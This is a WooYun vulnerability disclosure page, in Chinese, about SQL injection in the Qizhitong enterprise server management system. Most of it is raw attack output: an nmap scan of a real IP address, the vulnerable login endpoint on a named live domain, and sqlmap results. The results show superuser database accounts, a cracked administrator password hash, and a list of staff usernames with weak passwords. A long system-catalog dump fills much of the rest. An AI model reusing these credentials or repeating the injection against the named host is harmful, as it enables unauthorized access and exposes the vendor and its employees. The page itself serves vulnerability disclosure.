乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-11: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-01-23: 厂商已经主动忽略漏洞,细节向公众公开
企智通企业服务器综合管理系统sql漏洞,获得数据库信息及登录信息
1、网络遍历获得一个存活各类服务的ip地址。
Starting Nmap 7.00 ( https://nmap.org ) at 2015-12-10 14:35 CSTNSE: Loaded 132 scripts for scanning.NSE: Script Pre-scanning.Initiating NSE at 14:36Completed NSE at 14:36, 0.00s elapsedInitiating NSE at 14:36Completed NSE at 14:36, 0.00s elapsedInitiating Ping Scan at 14:36Scanning 121.14.204.18 [4 ports]Completed Ping Scan at 14:36, 0.45s elapsed (1 total hosts)Initiating Parallel DNS resolution of 1 host. at 14:36Completed Parallel DNS resolution of 1 host. at 14:36, 0.13s elapsedInitiating SYN Stealth Scan at 14:36Scanning 121.14.204.18 [1000 ports]Discovered open port 23/tcp on 121.14.204.18Discovered open port 25/tcp on 121.14.204.18Discovered open port 8080/tcp on 121.14.204.18Discovered open port 22/tcp on 121.14.204.18Discovered open port 443/tcp on 121.14.204.18Discovered open port 80/tcp on 121.14.204.18Discovered open port 8000/tcp on 121.14.204.18Stats: 0:00:58 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth ScanSYN Stealth Scan Timing: About 26.87% done; ETC: 14:38 (0:01:13 remaining)SYN Stealth Scan Timing: About 28.33% done; ETC: 14:39 (0:02:24 remaining)Increasing send delay for 121.14.204.18 from 0 to 5 due to 11 out of 30 dropped probes since last increase.SYN Stealth Scan Timing: About 29.77% done; ETC: 14:41 (0:03:25 remaining)Completed SYN Stealth Scan at 14:38, 102.34s elapsed (1000 total ports)Initiating Service scan at 14:38Scanning 7 services on 121.14.204.18
2、使用地址+端口进行登录
3、对页面进行sql测试
POST https://auth.qzt360.com:443/admin/doCheckLogin.jspPOST data: strVcName=&strVcPassword=
web application technology: JSPback-end DBMS operating system: Linux Red Hatback-end DBMS: PostgreSQLbanner: 'PostgreSQL 8.2.5 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.4.2 20041017 (Red Hat 3.4.2-6.fc3)'current user: 'pg'current schema (equivalent to database on PostgreSQL): 'public'hostname: Nonecurrent user is DBA: Truedatabase management system users [2]:[*] Administrator[*] pgdo you want to store hashes to a temporary file for eventual further processing with other tools [y/N] Ndo you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Ydatabase management system users password hashes:[*] Administrator [1]: password hash: md59b78e9569873a28178bc341daea12d93 clear-text password: 123456database management system users privileges:[*] Administrator (administrator) [3]: privilege: catupd privilege: createdb privilege: super[*] pg (administrator) [3]: privilege: catupd privilege: createdb privilege: superdatabase management system users roles:[*] Administrator (administrator) [3]: role: catupd role: createdb role: super[*] pg (administrator) [3]: role: catupd role: createdb role: super
[*] Administrator [1]: password hash: md59b78e9569873a28178bc341daea12d93 clear-text password: 123456database management system users privileges:[*] Administrator (administrator) [3]: privilege: catupd privilege: createdb privilege: super[*] pg (administrator) [3]: privilege: catupd privilege: createdb privilege: superdatabase management system users roles:[*] Administrator (administrator) [3]: role: catupd role: createdb role: super[*] pg (administrator) [3]: role: catupd role: createdb role: superDatabase: pg_catalogTable: pg_autovacuum[0 entries]+----------+---------+----------------+----------------+----------------+----------------+-----------------+-----------------+------------------+------------------+| vacrelid | enabled | vac_cost_limit | freeze_min_age | vac_cost_delay | freeze_max_age | vac_base_thresh | anl_base_thresh | vac_scale_factor | anl_scale_factor |+----------+---------+----------------+----------------+----------------+----------------+-----------------+-----------------+------------------+------------------++----------+---------+----------------+----------------+----------------+----------------+-----------------+-----------------+------------------+------------------+sqlmap got a 302 redirect to 'https://auth.qzt360.com/admin/welcome.jsp'. Do you want to follow? [Y/n] Yredirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] NyDatabase: pg_catalog Table: pg_language[0 entries]+-----------------------+-----------------------+---------+| lanacl | lanispl | lanname |+-----------------------+-----------------------+---------++-----------------------+-----------------------+---------+0 302 false false 544 baseline request127 panyj 123123 302 false false 544 386 panyj 123123 302 false false 544 453 panyj 123123 302 false false 544 969 lixinr 123123 302 false false 544 1114 dingyj 123123 302 false false 544 1192 dingyj 123123 302 false false 544 1295 yaol 123123 302 false false 544 1673 zhangn 123123 302 false false 544 1899 huangzx 123123 302 false false 544 2017 shenzy 123123 302 false false 544 2027 shenzy 123123 302 false false 544 2036 shenzy 123123 302 false false 544 2045 shenzy 123123 302 false false 544 3026 fengk 123456 302 false false 544 3659 yanghp 123456 302 false false 544 3758 chensx 123456 302 false false 544 3802 chensx 123456 302 false false 544 3813 mazj 123456 302 false false 544 3993 sunz 123456 302 false false 544 4161 zhangwh 123456 302 false false 544 4183 zhangwh 123456 302 false false 544 4277 yubin 123456 302 false false 544 4291 yubin 123456 302 false false 544 4323 yubin 123456 302 false false 544 4428 chenxf 123456 302 false false 544 4522 huoyq 123456 302 false false 544 4526 huoyq 123456 302 false false 544 4528 huoyq 123456 302 false false 544Database: pg_catalog Table: pg_namespace[0 entries]+--------+| nspacl |+--------++--------+Database: pg_catalog Table: pg_authid[0 entries]+-------------+| rolcanlogin |+-------------++-------------+Database: pg_catalog Table: pg_description[918 entries]+--------+----------+----------+------------------------------------------------------------------------+| objoid | classoid | objsubid | description |+--------+----------+----------+------------------------------------------------------------------------+| 1067 | 1255 | 0 | non-persistent series generator || 1068 | 1255 | 0 | non-persistent series generator || 1069 | 1255 | 0 | non-persistent series generator || 1078 | 1255 | 0 | less-equal-greater || 1079 | 1255 | 0 | convert text to regclass || 1080 | 1255 | 0 | hash || 1081 | 1255 | 0 | format a type oid and atttypmod to canonical SQL || 1082 | 1247 | 0 | ANSI SQL date || 1083 | 1247 | 0 | hh:mm:ss, ANSI SQL time || 1084 | 1255 | 0 | I/O || 1085 | 1255 | 0 | I/O || 1086 | 1255 | 0 | equal || 1087 | 1255 | 0 | less-than || 1088 | 1255 | 0 | less-than-or-equal || 1089 | 1255 | 0 | greater-than || 1090 | 1255 | 0 | greater-than-or-equal || 1091 | 1255 | 0 | not equal || 1092 | 1255 | 0 | less-equal-greater || 1102 | 1255 | 0 | less-than || 1103 | 1255 | 0 | less-than-or-equal || 1104 | 1255 | 0 | greater-than || 1105 | 1255 | 0 | greater-than-or-equal || 1106 | 1255 | 0 | not equal || 1107 | 1255 | 0 | less-equal-greater || 1114 | 1247 | 0 | date and time || 1138 | 1255 | 0 | larger of two || 1139 | 1255 | 0 | smaller of two || 1140 | 1255 | 0 | subtract || 1141 | 1255 | 0 | add || 1142 | 1255 | 0 | subtract || 1143 | 1255 | 0 | I/O || 1144 | 1255 | 0 | I/O || 1145 | 1255 | 0 | equal || 1146 | 1255 | 0 | add || 1147 | 1255 | 0 | subtract || 1148 | 1255 | 0 | multiply || 1149 | 1255 | 0 | divide || 1150 | 1255 | 0 | I/O || 1151 | 1255 | 0 | I/O || 1152 | 1255 | 0 | equal || 1153 | 1255 | 0 | not equal || 1154 | 1255 | 0 | less-than || 1155 | 1255 | 0 | less-than-or-equal || 1156 | 1255 | 0 | greater-than-or-equal || 1157 | 1255 | 0 | greater-than || 1158 | 1255 | 0 | convert UNIX epoch to timestamptz || 1159 | 1255 | 0 | adjust timestamp to new time zone || 1160 | 1255 | 0 | I/O || 1161 | 1255 | 0 | I/O || 1162 | 1255 | 0 | equal || 1163 | 1255 | 0 | not equal || 1164 | 1255 | 0 | less-than || 1165 | 1255 | 0 | less-than-or-equal || 1166 | 1255 | 0 | greater-than-or-equal || 1167 | 1255 | 0 | greater-than || 1168 | 1255 | 0 | subtract || 1169 | 1255 | 0 | add || 1170 | 1255 | 0 | subtract || 1171 | 1255 | 0 | extract field from timestamp with time zone || 1172 | 1255 | 0 | extract field from interval || 1173 | 1255 | 0 | convert abstime to timestamp with time zone || 1174 | 1255 | 0 | convert date to timestamp with time zone || 1175 | 1255 | 0 | promote groups of 24 hours to numbers of days || 1176 | 1255 | 0 | convert date and time to timestamp with time zone || 1177 | 1255 | 0 | convert reltime to interval || 1178 | 1255 | 0 | convert timestamp with time zone to date || 1179 | 1255 | 0 | convert abstime to date || 1180 | 1255 | 0 | convert timestamp with time zone to abstime || 1181 | 1255 | 0 | age of a transaction ID, in transactions before current transaction || 1184 | 1247 | 0 | date and time with time zone || 1186 | 1247 | 0 | @ <number> <units>, time interval || 1188 | 1255 | 0 | subtract || 1189 | 1255 | 0 | plus || 1190 | 1255 | 0 | minus || 1191 | 1255 | 0 | convert text to timestamp with time zone || 1192 | 1255 | 0 | convert timestamp with time zone to text || 1193 | 1255 | 0 | convert interval to text || 1194 | 1255 | 0 | convert interval to reltime || 1195 | 1255 | 0 | smaller of two || 1196 | 1255 | 0 | larger of two || 1197 | 1255 | 0 | smaller of two || 1198 | 1255 | 0 | larger of two || 1199 | 1255 | 0 | date difference preserving months and years || 1200 | 1255 | 0 | adjust interval precision || 1215 | 1255 | 0 | get description for object id and catalog name || 1216 | 1255 | 0 | get description for table column || 1217 | 1255 | 0 | truncate timestamp with time zone to specified units || 1218 | 1255 | 0 | truncate interval to specified units || 1219 | 1255 | 0 | increment || 1230 | 1255 | 0 | absolute value || 1236 | 1255 | 0 | larger of two || 1237 | 1255 | 0 | smaller of two || 1238 | 1255 | 0 | matches regex., case-insensitive || 1239 | 1255 | 0 | does not match regex., case-insensitive || 1240 | 1255 | 0 | matches regex., case-insensitive || 1241 | 1255 | 0 | does not match regex., case-insensitive || 1242 | 1255 | 0 | I/O || 1243 | 1255 | 0 | I/O || 1244 | 1255 | 0 | I/O || 1245 | 1255 | 0 | I/O || 1246 | 1255 | 0 | less-than || 1251 | 1255 | 0 | absolute value || 1252 | 1255 | 0 | does not match regex., case-sensitive || 1253 | 1255 | 0 | absolute value || 1254 | 1255 | 0 | matches regex., case-sensitive || 1256 | 1255 | 0 | does not match regex., case-sensitive || 1257 | 1255 | 0 | length || 1258 | 1255 | 0 | concatenate || 1263 | 1255 | 0 | convert text to interval || 1264 | 1255 | 0 | convert encoding name to encoding id || 1265 | 1255 | 0 | not equal || 1266 | 1247 | 0 | hh:mm:ss, ANSI SQL time || 1267 | 1255 | 0 | I/O || 1268 | 1255 | 0 | btree(internal) || 1269 | 1255 | 0 | bytes required to store the value, perhaps with compression || 1271 | 1255 | 0 | SQL92 interval comparison || 1272 | 1255 | 0 | convert date and time to timestamp || 1273 | 1255 | 0 | extract field from time with time zone || 1274 | 1255 | 0 | add || 1275 | 1255 | 0 | subtract || 1276 | 1255 | 0 | multiply || 1277 | 1255 | 0 | divide || 1278 | 1255 | 0 | add || 1279 | 1255 | 0 | subtract || 1280 | 1255 | 0 | multiply || 1281 | 1255 | 0 | divide || 1282 | 1255 | 0 | quote an identifier for usage in a querystring || 1283 | 1255 | 0 | quote a literal for usage in a querystring || 1285 | 1255 | 0 | not in || 1286 | 1255 | 0 | not in || 1287 | 1255 | 0 | convert int8 to oid || 1288 | 1255 | 0 | convert oid to int8 || 1289 | 1255 | 0 | convert int8 to text || 1290 | 1255 | 0 | convert text to int8 || 1291 | 1255 | 0 | adjust any array to new element typmod || 1292 | 1255 | 0 | equal || 1293 | 1255 | 0 | latest tid of a tuple || 1294 | 1255 | 0 | latest tid of a tuple || 1295 | 1255 | 0 | promote groups of 30 days to numbers of months || 1296 | 1255 | 0 | convert time and date to timestamp || 1297 | 1255 | 0 | convert date and time with time zone to timestamp with time zone || 1298 | 1255 | 0 | convert time with time zone and date to timestamp with time zone || 1299 | 1255 | 0 | current transaction time || 1300 | 1255 | 0 | restriction selectivity for position-comparison operators || 1301 | 1255 | 0 | join selectivity for position-comparison operators || 1302 | 1255 | 0 | restriction selectivity for containment comparison operators || 1303 | 1255 | 0 | join selectivity for containment comparison operators || 1304 | 1255 | 0 | SQL92 interval comparison || 1305 | 1255 | 0 | SQL92 interval comparison || 1306 | 1255 | 0 | SQL92 interval comparison || 1307 | 1255 | 0 | SQL92 interval comparison || 1308 | 1255 | 0 | SQL92 interval comparison || 1309 | 1255 | 0 | SQL92 interval comparison || 1310 | 1255 | 0 | SQL92 interval comparison || 1311 | 1255 | 0 | SQL92 interval comparison || 1312 | 1255 | 0 | I/O || 1313 | 1255 | 0 | I/O || 1314 | 1255 | 0 | less-equal-greater || 1315 | 1255 | 0 | less-equal-greater || 1316 | 1255 | 0 | convert timestamp to time || 1317 | 1255 | 0 | length || 1318 | 1255 | 0 | character length || 1319 | 1255 | 0 | equal || 1326 | 1255 | 0 | divide || 1339 | 1255 | 0 | base 10 logarithm || 1340 | 1255 | 0 | base 10 logarithm || 1341 | 1255 | 0 | natural logarithm || 1342 | 1255 | 0 | round to nearest integer || 1343 | 1255 | 0 | truncate to integer || 1344 | 1255 | 0 | square root || 1345 | 1255 | 0 | cube root || 1346 | 1255 | 0 | exponentiation || 1347 | 1255 | 0 | exponential || 1348 | 1255 | 0 | get description for object id (deprecated) || 1349 | 1255 | 0 | print type names of oidvector field || 1350 | 1255 | 0 | I/O || 1351 | 1255 | 0 | I/O || 1352 | 1255 | 0 | equal || 1353 | 1255 | 0 | not equal || 1354 | 1255 | 0 | less-than || 1355 | 1255 | 0 | less-than-or-equal || 1356 | 1255 | 0 | greater-than-or-equal || 1357 | 1255 | 0 | greater-than || 1358 | 1255 | 0 | less-equal-greater || 1359 | 1255 | 0 | convert date and time with time zone to timestamp with time zone || 1362 | 1255 | 0 | hostmask of address || 1364 | 1255 | 0 | convert abstime to time || 1365 | 1255 | 0 | make ACL item || 1367 | 1255 | 0 | character length || 1368 | 1255 | 0 | exponentiation || 1369 | 1255 | 0 | character length || 1370 | 1255 | 0 | convert time to interval || 1371 | 1255 | 0 | view system lock information || 1372 | 1255 | 0 | character length || 1373 | 1255 | 0 | coerce array to another type and adjust element typmod || 1374 | 1255 | 0 | octet length || 1375 | 1255 | 0 | octet length || 1376 | 1255 | 0 | factorial || 1377 | 1255 | 0 | larger of two || 1378 | 1255 | 0 | smaller of two || 1379 | 1255 | 0 | larger of two || 1380 | 1255 | 0 | smaller of two || 1381 | 1255 | 0 | character length || 1382 | 1255 | 0 | extract field from abstime || 1383 | 1255 | 0 | extract field from reltime || 1384 | 1255 | 0 | extract field from date || 1385 | 1255 | 0 | extract field from time || 1386 | 1255 | 0 | date difference from today preserving months and years || 1387 | 1255 | 0 | constraint description || 1388 | 1255 | 0 | convert timestamptz to timetz || 1389 | 1255 | 0 | finite timestamp? || 1390 | 1255 | 0 | finite interval? || 1391 | 1255 | 0 | Statistics: Start time for current backend session || 1392 | 1255 | 0 | Statistics: Address of client connected to backend || 1393 | 1255 | 0 | Statistics: Port number of client connected to backend || 1394 | 1255 | 0 | absolute value || 1395 | 1255 | 0 | absolute value || 1396 | 1255 | 0 | absolute value || 1397 | 1255 | 0 | absolute value || 1398 | 1255 | 0 | absolute value || 1400 | 1255 | 0 | convert varchar to name || 1401 | 1255 | 0 | convert name to varchar || 1402 | 1255 | 0 | current schema name || 1403 | 1255 | 0 | current schema search list || 1404 | 1255 | 0 | substitute portion of string || 1405 | 1255 | 0 | substitute portion of string || 1406 | 1255 | 0 | vertically aligned? || 1407 | 1255 | 0 | horizontally aligned? || 1408 | 1255 | 0 | parallel? || 1409 | 1255 | 0 | perpendicular? || 1410 | 1255 | 0 | vertical? || 1411 | 1255 | 0 | horizontal? || 1412 | 1255 | 0 | parallel? || 1413 | 1255 | 0 | perpendicular? || 1414 | 1255 | 0 | vertical? || 1415 | 1255 | 0 | horizontal? || 1416 | 1255 | 0 | center of || 1417 | 1255 | 0 | bool is not true (ie, false or unknown) || 1418 | 1255 | 0 | bool is not false (ie, true or unknown) || 1419 | 1255 | 0 | convert interval to time || 1421 | 1255 | 0 | convert points to box || 1422 | 1255 | 0 | add point to box (translate) || 1423 | 1255 | 0 | subtract point from box (translate) || 1424 | 1255 | 0 | multiply box by point (scale) || 1425 | 1255 | 0 | divide box by point (scale) || 1426 | 1255 | 0 | path contains point? || 1427 | 1255 | 0 | I/O || 1428 | 1255 | 0 | polygon contains point? || 1429 | 1255 | 0 | point contained in polygon? || 1430 | 1255 | 0 | path closed? || 1431 | 1255 | 0 | path open? || 1432 | 1255 | 0 | number of points in path || 1433 | 1255 | 0 | close path || 1434 | 1255 | 0 | open path || 1435 | 1255 | 0 | concatenate open paths || 1436 | 1255 | 0 | add (translate path) |+--------+----------+----------+------------------------------------------------------------------------+
修复注入漏洞,特别是123456弱口令是干啥的?
未能联系到厂商或者厂商积极拒绝